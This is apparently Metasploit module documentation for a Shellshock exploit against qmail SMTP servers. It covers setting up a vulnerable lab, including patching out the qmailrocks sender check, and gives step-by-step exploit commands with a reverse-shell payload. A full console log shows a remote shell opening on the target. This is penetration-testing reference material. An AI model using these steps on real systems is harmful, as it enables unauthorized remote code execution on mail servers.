## Vulnerable Application Any qmail version (works on latest versions, qmail-1.03 and netqmail-1.06) running on a system with a vulnerable BASH (Shellshock). In order to execute code, /bin/sh has to be linked to bash (usually default configuration) and a valid recipient must be set on the RCPT TO field (usually admin@exampledomain.com). The exploit does not work on the "qmailrocks" community version as it ensures the MAILFROM field is well-formed. ## Setting up a vulnerable environment Install Qmail on a Linux server with a shellshock vulnerable bash. Ensure that /bin/sh is linked to bash. Create an e-mail account on that qmail server. IMPORTANT: there is a community version of qmail, "qmailrocks" (http://qmailrocks.thibs.com/) which apply a patch that checks the vulnerable MAILFROM parameter. This version (with the patch applied) is NOT vulnerable. If you are using this version, change the "int mfcheck()" function on qmail-smtpd.c and ensure it returns always 0 (after applying the patch) and re-compile qmail-smtpd. ## Verification Steps 1. `use exploit/unix/smtp/qmail_bash_env_exec` 2. `set RHOST ` 3. `set MAILTO ` 4. `set payload cmd/unix/reverse` 5. `set LHOST ` 7. optionally set `RPORT` and `LPORT` 8. `exploit` 9. **Verify** a new shell session is started ## Options **MAILTO** A valid e-mail recipient. Usually, admin@targetdomain.com can be used. ## Scenarios **Tested on qmail-1.03 on Debian 6.0.6 (squeeze). BASH version 4.1.5(1).** ``` msf > use exploit/unix/smtp/qmail_bash_env_exec msf exploit(qmail_bash_env_exec) > set rhost 192.168.1.113 rhost => 192.168.1.113 msf exploit(qmail_bash_env_exec) > set mailto "admin@testqmail2.test" mailto => admin@testqmail2.test msf exploit(qmail_bash_env_exec) > set payload cmd/unix/reverse payload => cmd/unix/reverse msf exploit(qmail_bash_env_exec) > show options Module options (exploit/unix/smtp/qmail_bash_env_exec): Name Current Setting Required Description ---- --------------- -------- ----------- MAILTO admin@testqmail2.test yes TO address of the e-mail RHOST 192.168.1.113 yes The target address RPORT 25 yes The target port (TCP) Payload options (cmd/unix/reverse): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.1.102 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(qmail_bash_env_exec) > run [*] Started reverse TCP double handler on 192.168.1.102:4444 [*] 192.168.1.113:25 - Sending the payload... [*] 192.168.1.113:25 - Sending RCPT TO admin@testqmail2.test [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo RvZfov9i2ZuveLXA; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "RvZfov9i2ZuveLXA\r\n" [*] Matching... [*] A is input... [*] Command shell session 19 opened (192.168.1.102:4444 -> 192.168.1.113:48167) at 2017-05-04 15:11:02 +0200 whoami vpopmail ```